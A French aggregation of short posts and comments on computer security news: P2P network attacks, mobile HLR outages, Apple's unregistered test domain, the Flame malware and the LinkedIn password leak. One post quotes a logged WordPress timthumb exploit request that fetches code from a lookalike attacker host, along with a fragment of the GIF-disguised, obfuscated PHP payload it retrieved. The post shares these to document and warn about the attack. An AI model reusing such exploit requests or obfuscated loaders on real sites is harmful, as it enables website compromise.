Les techniques fondées sur le #pair-à-pair sont souvent présentées comme permettant un Internet sans centre et sans autorité. Ce n’est vrai que si on ne se préoccupe pas de sécurité. Dès qu’on est confronté à des méchants qui tentent délibérement d’attaquer le réseau, le problème est bien plus complexe. Désolé de jouer les porteurs de mauvaise nouvelle mais la plupart des promoteurs du pair-à-pair se font des illusions.
Merci pour votre article qui est assez intéressant. Cependant, je ne suis pas tout à fait d’accord avec vous quand vous dites que n’importe qui peut sortir 20 000 machines virtuelles pour spammer le réseau. Cela marchera quelques jours au mieux et puis les adresses IP de ces machines vont se faire banir de la plupart des clients (en IPv6, on banira le préfixe).
Dans un réseau maillé (comme qaul, que je citais dans mon article), cela ne marchera pas puisque même l’allocation des adresses est contrôlée par les pairs.
Dans une DHT sur l’Internet, avec des adresses IP publiques (je passe sur l’allocation pas du tout pair-à-pair des adresses IP...), qui va gérer la liste noire ? Précisément le composant central.
Le problème est difficile. Des centaines de chercheurs ont déjà bossé dessus. On ne le résoudra pas avec une idée « dos de l’enveloppe ».
Les réseaux de confiance (GPG) ne sont-ils pas sensés répondre à cette problématique ? Il y a une hiérarchie, mais elle est relative à chacun des pairs.
#P2P #cybersécurité (voir aussi ce qu’il en coûte de repérer des brèches ►http://www.wired.com/threatlevel/2013/03/att-hacker-gets-3-years / je sais je mélange tout, mais ça me scotche)
Tu ne peux pas mettre dans le même panier un protocole de la couche application comme Bittorrent et un de la couche réseau comme Qaul, ce n’est pas la même problématique. Un protocole de la couche application a déjà à sa disposition l’identifiant de la couche réseau, tandis que la couche réseau n’a rien de fiable en dessous. Il est donc beaucoup plus compliqué d’avoir un Qaul fonctionnel qu’un Bittorrent.
Ça ne veut pas dire pour autant que BT n’est pas un protocole P2P, il l’est relativement à la couche à laquelle il appartient. Quand on le fait tourner par-dessus IP il repose en effet sur un système d’allocation centralisé, mais peut-être qu’un jour on le fera tourner sur une pile réseau entièrement P2P.
Une précision concernant Bittorrent : la manière de récupérer le hash du torrent est en dehors du champ du protocole. La méthode que tu évoques qui consiste à interroger un moteur de recherche Web n’est pas la seule possible, il existe un client torrent qui implémente une recherche P2P : http://www.tribler.org
La sécurité informatique doit être repensée et se préparer à un monde où la cryptographie ne sera plus déterminante. C’est l’avertissement lancé par Adi Shamir, l’un des créateurs de l’algorithme de chiffrement asymétrique RSA. Selon lui, le cyber-espionnage réduit l’intérêt de la cryptographie.
#sécurité_informatique #rsa #cryptographie #cyber-espionnage
#Linkfluence, un serveur aussi bâclé que son étude sur les sites extrémistes
http://reflets.info/linkfluence-un-serveur-aussi-bacle-que-son-etude-sur-les-sites-extremistes
Dans l’après-midi, Linkfluence a annoncé que l’on allait, grâce à une de leurs études dont ils ont le secret, connaitre « les cinq femmes les plus influentes sur le Web« . Vue la méthodologie utilisée pour lister les sites extrémistes, liste dans laquelle Reflets s’était retrouvé coincé entre Alain Soral et l’Alliance spirituelle contre la subversion mondialiste, [...]
#A_la_Une #On_s'en_fout #Technos #buzz #CFPJ #featured #MySQL #Sécurité_informatique
Plusieurs pannes spectaculaires du réseau entier d’un opérateur de téléphonie mobile (comme la panne d’#Orange en juillet 2012) ont mis l’accent sur la vulnérabilité des #HLR (Home Location register), un composant centralisé du réseau dont la panne coupe le réseau entier.
Cet exposé à hack.lu explique pourquoi ces pannes : les HLR sont encore gérés, du point de vue sécurité, comme l’était le reste de l’informatique il y a quinze ans. Pas de tests de sécurité dignes de ce nom, pas d’annonces de vulnérabilités, pas de circulation de l’information, et, pire, des menaces contre ceux qui veulent étudier ladite sécurité. Une bogue suffit à les planter, une vraie attaque ferait sans doute beaucoup des dégâts.
http://2012.hack.lu/archive/2012/Hack.lu-Philippe-Langlois-remote-HLR-crash.pptx.pdf
Au fait, bon article expliquant le HLR : http://fr.wikipedia.org/wiki/Home_Location_Register
Amusant problème de #sécurité_informatique. #Apple a changé certains de ses logiciels (comme #iTunes) pour tester si le #DNS fonctionne en tenant de se connecter à www.bogusapple.com. Le but était sans doute de tester avec un nom qui marchait et un qui ne marchait pas. Mais Apple n’avait pas enregistré le nom et quelqu’un l’a fait hier, recevant ainsi les connexions (et les informations privées) de plein d’Apple fanboys...
https://discussions.apple.com/thread/4380270
http://www.bogusapple.com
Apple aurait dû utiliser comme « nom garanti d’échouer », le TLD spécial .invalid ou, tout simplement, un sous-domaine d’apple.com...
C’est toujours amusant de regarder les journaux de son serveur HTTP, on y découvre les dernières attaques à la mode. Voici par exemple un client qui réclame la ressource « //wp-content/themes/rend/scripts/timthumb.php ?src=http://flickr.com.alba-sport.net/spread.php » Il tente manifestement de profiter d’une bogue de #Wordpress (« /wp-content ») pour rediriger vers un URL qui ressemble à celui de #Flickr mais ne l’est pas (« flickr.com.alba-sport.net » est un sous-domaine de « alba-sport.net » et n’a rien à voir avec Flickr).
À cette adresse, on trouve un fichier rigolo, qui commence par l’en-tête #GIF « GIF89a » (ce qui trompe les outils de « content sniffing » comme la commande Unix file ou comme Internet Explorer) mais dont le contenu est en #PHP et semble indiquer une attaque par déni de service : « set_time_limit(0) ; ... $rhs = ’zZhOYp... ... eval(gzinflate(str_rot13(base64_decode($rhs)))) ; » Sans avoir testé, je suppose que cela lancera PHP dans un épuisement complet des ressources de la machine.
Donc, ne visitez pas le truc en question si vous n’êtes pas sûr de votre machine :
Et désolé pour la bêtise de #Seenthis_Bug qui massacre le nom indiqué en en faisant un URL. Faut lire le source pour voir le vrai nom.
Bonjour,
Pour ma part j’ai reçu une attaque comparable sur un blog que j’héberge. Le blog s’est fait partiellement défacé. L’attaquant a pris soin de ne pas toucher à la navigation classique mais de ne modifier que les pages affichées aux robots de moteur de recherche. Et ce en plaçant ce .htaccess :
Je ne me suis aperçu de l’entourloupe que plusieurs mois après la mise en place de la modification.
Le script installé était plus fourbe encore. Plutôt que de stocker localement les publicités à afficher (pour des produits pharmaceutiques, des rolex et consors), il faisait un GET vers un site distant et affichait le résultat.
J’ai dû aller jusqu’à la capture tshark pour retrouver le mode opératoire !
Emmanuel Thierry
Entré par hasard sur un serveur de la Banque de France, l’internaute est relaxé - Le Nouvel Observateur
http://tempsreel.nouvelobs.com/societe/20120920.FAP8656/entre-par-hasard-sur-un-serveur-de-la-banque-de-france-l-intern
« En 2008, mon client, alors au chômage, tentait de contourner les numéros surtaxés en utilisant Skype », un logiciel permettant de passer des communications téléphoniques via internet, a expliqué à Sipa Me Hélène Laudic-Baron. « En tapant un numéro au hasard, puis en composant tout simplement le code 1, 2, 3, 4, 5, 6, il est entré très facilement dans le service de surendettement de la Banque de France, sans même savoir où il était puisqu’aucun message lui indiquait où il était ».
Les #hackers ont enfin fait cracker le Sénat | Sabine Blanc
►http://owni.fr/2012/07/20/les-hackers-ont-enfin-fait-cracker-le-senat
Enfin ! Le dernier #rapport du Sénat sur la #cyberdéfense montre un changement net de regard sur la communauté des hackers. Naguère assimilés à des vilains pirates informatiques avides de gains, ils sont maintenant considérés pour ce qu’ils sont vraiment : un précieux vivier de talents en matière de sécurité informatique.
#Analyse #Politique #Pouvoirs #Eric_Filiol #hacking #LCEN #sécurité_informatique #sénat
Rappel : tous les abonnés #LinkedIn doivent changer leur mot de passe d’urgence :
http://blog.linkedin.com/2012/06/06/linkedin-member-passwords-compromised (blog officiel, donc minimise sérieusement le risque)
L’annonce original (pour voir si SeenThis trouve la langue) : http://www.dagensit.no/article2411857.ece
Des tas de gens ont commencé à travailler sur la liste de mots de passe publiés, pour en extraire le plus grand nombre possible : http://pastebin.com/5pjjgbMt
Voir aussi http://seenthis.net/messages/72501
[C’est pas sur #SeenThis, avec sa sécurité ultra-béton et ses mots de passe salés dix fois de suite et condensés en SHA-512, que ça arriverait.]
SSTIC 2012, Day1 - Le blog de Vanhu
http://vanhu.free.fr/blog/index.php?post/2012/06/06/SSTIC-2012,-Day1
Quelles adaptations faudra-t-il faire aux listes noires d’adresses IP pour #IPv6 ?
http://www.circleid.com/posts/20120526_running_dnsbls_in_an_ipv6_world
Le sujet du jour en #sécurité_informatique est le malware #Flame, un ensemble logiciel apparemment très complexe qui a infecté pas mal de machines Windows au Moyen-Orient (notez que, parmi les nombreux articles dans les médias consacrés à Flame, quasiment aucun n’ose dire que seule les machines Windows étaient vulnérables ; les avocats de Microsoft veillent).
Sa complexité (pas à la portée de Jean-Kevin dans son garage) et le fait que Flame ne semble pas essayer de voler de l’argent donnent à penser qu’il s’agit d’un outil d’espionnage conçu par un État puissant (comme son prédécesseur #DuQu, alors que #Stuxnet, lui, était offensif, il essayait de casser des machines).
L’analyse technique détaillée par Kaspersky :
http://www.securelist.com/en/blog?weblogid=208193522
Et une autre par le laboratoire CrySyS (Wiper est l’autre nom de Flame), bien plus détaillée :
http://www.crysys.hu/skywiper/skywiper.pdf
Une analyse critique de ces analyses :
http://www.circleid.com/posts/20120522_a_closer_look_at_the_flame_flamer_skywiper_malware
L’article du CERT iranien :
http://www.certcc.ir/index.php?name=news&file=article&sid=1894
Bon article de synthèse de Wired, si vous voulez donner quelque chose de correct à lire à des non-experts :
http://www.wired.com/threatlevel/2012/05/flame
Un article en français très trollant (pas tort sur le fond mais insupportable d’arrogance) :
Bien, je n’ai peut-être qu’un blog perso, mais j’ai rajouté lors de la création de mon article cette accusation sur Windows (on verra bien si j’ai une missive d’un avocat ^^), en me demandant même, si une telle attaque pouvait être possible avec un bon linux. Linux n’est pas invulnérable mais rendrait la tâche plus difficile. ►http://neosting.net/actualite/flame-le-cyber-espionnage-a-la-sauce-gouvernementale.html
Bonne description d’un logiciel malveillant, Android.Bmaster, distribué dans un #cheval_de_Troie, et qui infecte les smartphones #Android. Une fois touchés, ceux-ci contactent le maître du #botnet, qui leur fait appeler des numéros spéciaux surtaxés. Le botnet rapporterait à son chef entre 1600 et 9000 $ par jour (l’évaluation économique est la partie la plus intéressante de l’article).
(Android.Bmaster est diffusé uniquement en Chine, le malware, c’est comme les séries TV, c’est national.)
http://www.symantec.com/connect/blogs/androidbmaster-million-dollar-mobile-botnet
L’Europe met des barbelés numériques | Sabine Blanc
►http://owni.fr/2012/04/18/leurope-met-des-barbeles-numeriques
Un projet de #directive européenne prévoit de pénaliser la possession et la distribution d’outils de hacking pour lutter contre la cybercriminalité. Une disposition aberrante y compris aux yeux de plusieurs communautés d’experts en sécurité informatique.
#Cultures_numériques #Internet #hackers #lobby #Parlement_européen #Politique #sécurité_informatique
Les #hackers, un danger d’intérêt public | Sabine Blanc
►http://owni.fr/2012/04/13/les-hackers-un-danger-dinteret-public
Pendant trois jours, le festival Hackito Ergo Sum réunit à Paris des hackers autour du thème de la sécurité. Un enjeu fondamental, ce que ne semble pas saisir le législateur : un projet de loi européen étend les sanctions contre les hackers.
#Activisme #Pouvoirs #Reportage #Hackito_Ergo_Sum_2012 #Philippe_Langlois #Politique #sécurité_informatique
La NSA recycle Android | Pierre Leibovici
http://owni.fr/2012/01/31/la-nsa-recycle-android
Android est le système d’exploitation mobile le plus utilisé au monde. Mais aussi celui qui comporte le plus de failles de sécurité. Heureusement, l’Agence nationale de sécurité (NSA) américaine vient d’en publier une version améliorée. Et open source. Une louable attention qui soulève des soupçons.
#Analyse #Pouvoirs #Surveillance #Androïd #licence_libre #nsa #renseignement #sécurité_informatique #téléphonie_mobile
Hacker de 7 ans ?
Mes neveux jouent parfois dessus. Pendant que le grand lance la Wii et me demande de configurer la bonne entrée vidéo (non automatique, allez savoir pourquoi), le petit s’installe devant l’ordinateur, dont l’accès est protégé par un mot de passe. Il sait que mon mot de passe est long et comporte des caractères atypiques, et malgré ses innombrables essais et indiscrétions, il n’a jamais su le déchiffrer en me regardant le taper sous ses yeux. Pour autant, il ne se démonte pas. Impatient qu’il est de jouer, il en tape un, dans l’espoir de débloquer les jeux avant que je n’arrive.
Quel est le mot de passe qu’il tente en tout premier ?
Bingo !
Mon prénom.
Un enfant de 7 ans peut donc hacker un compte informatique dont le mot de passe est le prénom. C’est même la toute première chose qui lui vient à l’esprit et qu’il tente (et ce même alors qu’il sait l’essai vain).
J’en ai donc profité pour le sensibiliser à la sécurité des mots de passes. ;)
#sécurité_informatique #mot_de_passe #enfant #famille #jeux_vidéo #protection #indiscrétion #sensibilisation #hacking_en_culottes_courtes
Bon article technique sur la sécurité des CPE (le petit machin qui connecte le réseau local de votre maison ou de votre petite entreprise à l’Internet, une « box », un Linksys acheté à Carrefour, etc). On se focalise sur la sécurité des postes clients et des serveurs et on oublie celle de ces petits boîtiers, qui font souvent l’objet d’attaques, comme par le logiciel malveillant #Hydra, décrit ici.
http://www.securelist.com/en/analysis/204792187/Heads_of_the_Hydra_Malware_for_Network_Devices
RetroShare : Logiciel de communication entre amis sécurisé et décentralisé
http://retroshare.sourceforge.net/index_fr.html
RetroShare est un logiciel de communication opensource, multiplate-forme, privé, sécurisé et décentralisé.
Il vous permet de discuter et partager des fichiers en toute sécurité avec vos amis et votre famille en utilisant un modèle de confiance distribuée pour authentifier les personnes et l’OpenSSL pour crypter toutes les communications.
RetroShare permet le partage de fichiers, le chat, l’envoi de messages, l’utilisation de forums et de canaux de diffusion
Pas encore testé mais intéressant à première vue.
#sécurité_informatique #outils
Un virus de type « keylogger » a envahi les ordinateurs du poste de commande des drones militaires américains :
Exclusive: Computer Virus Hits U.S. Drone Fleet
►http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet
Military network security specialists aren’t sure whether the virus and its so-called “keylogger” payload were introduced intentionally or by accident; it may be a common piece of malware that just happened to make its way into these sensitive networks. The specialists don’t know exactly how far the virus has spread. But they’re sure that the infection has hit both classified and unclassified machines at Creech. That raises the possibility, at least, that secret data may have been captured by the keylogger, and then transmitted over the public internet to someone outside the military chain of command.
La guerre électronique franchit la une nouvelle étape, non ? L’info paraît tout aussi intéressante que StuxNet, même si le virus ne devait pas cibler spécifiquement ces ordinateurs là en particulier...
#guerre_électronique #usa #drone #virus #sécurité_informatique #armée #logiciel_malveillant #malware #keylogger
Our security auditor is an idiot, how do I give him the information he wants? - Server Fault
http://serverfault.com/questions/293217/our-security-auditor-is-an-idiot-how-do-i-give-him-the-information-he-w
A security auditor for our servers has demanded the following within two weeks:
– A list of current usernames and plain-text passwords for all user accounts on all servers
– A list of all password changes for the past six months, again in plain-text
– A list of “every file added to the server from remote devices” in the past six months
– The public and private keys of any SSH keys
– An email sent to him every time a user changes their password, containing the plain text password
We’re running Red Hat Linux 5/6 and CentOS 5 boxes with LDAP authentication.
As far as I’m aware, everything on that list is ether impossible or incredibly difficult to get, but if I don’t provide this information we lose access to our payments platform, and any income we might have got while we move away. Any suggestions for how I can solve or fake this information?
#sécurité_informatique #audit #serveur #discussion #témoignage
Belgique et Pays-Bas : cibles idéales des cyberattaques | Marco Bertolini
http://owni.fr/2011/09/08/belgique-et-pays-bas-cibles-ideales-des-cyberattaques
Piraté depuis l’Iran, le site de certification du gouvernement néerlandais suscite de grandes craintes au Benelux. Numérisés de l’école au budget, la Belgique et les Pays Bas souffriraient d’un grave déficit de sécurité informatique qui en feraient des proies de choix pour les cyberattaques.
#Libertés_Numériques #Pouvoirs #belgique #eGouvernement #espionnage #pays-bas #sécurité_informatique
Confidentialité et anonymat, pour tous et partout
http://tails.boum.org/index.fr.html
« Tails is a live CD or live USB that aims at preserving your privacy and anonymity.
Il vous permet de :
– utiliser Internet de manière anonyme (presque) partout et avec n’importe quel ordinateur :
– toutes les connexions sortantes vers Internet sont obligées de passer par le réseau Tor ;
– ne pas laisser de traces sur l’odinateur utilisé, à moins que vous ne le demandiez explicitement. »
#sécurité_informatique #anonymat
Il y a eu un peu de buzz récemment à propos d’une « attaque » DNS contre le domaine national belge, .BE.
[Avertissement : comme la plupart des articles concernant la sécurité
informatique, ceux-ci contiennent 90 % d’énormités.]
Le communiqué officiel :
http://www.dns.be/fr/home.php?n=461
Les connaisseurs du DNS auront noté l’énormité dans le communiqué du
registre de .BE, « Un botnet demande aux serveurs de nom de DNS.be les
’MX records’ associés aux noms de domaine. Cette demande est
inhabituelle pour les serveurs de nom d’un TLD étant donné que les
records en question se trouvent dans les serveurs de nom des
titulaires de noms de domaine. » C’est complètement faux puisque justement les
serveurs du TLD (.BE, .COM, etc) reçoivent l’intégralité de la première requête
(ensuite, l’information est dans le cache du résolveur qui a demandé), MX ou pas MX. Tous les serveurs de TLD reçoivent ainsi 30 à 40 % de requêtes MX en temps normal.
Le premier article public :
Le plus débile :
http://www.undernews.fr/hacking-hacktivisme/linternet-belge-cible-dune-cyberattaque.html
Le titre le plus idiot :
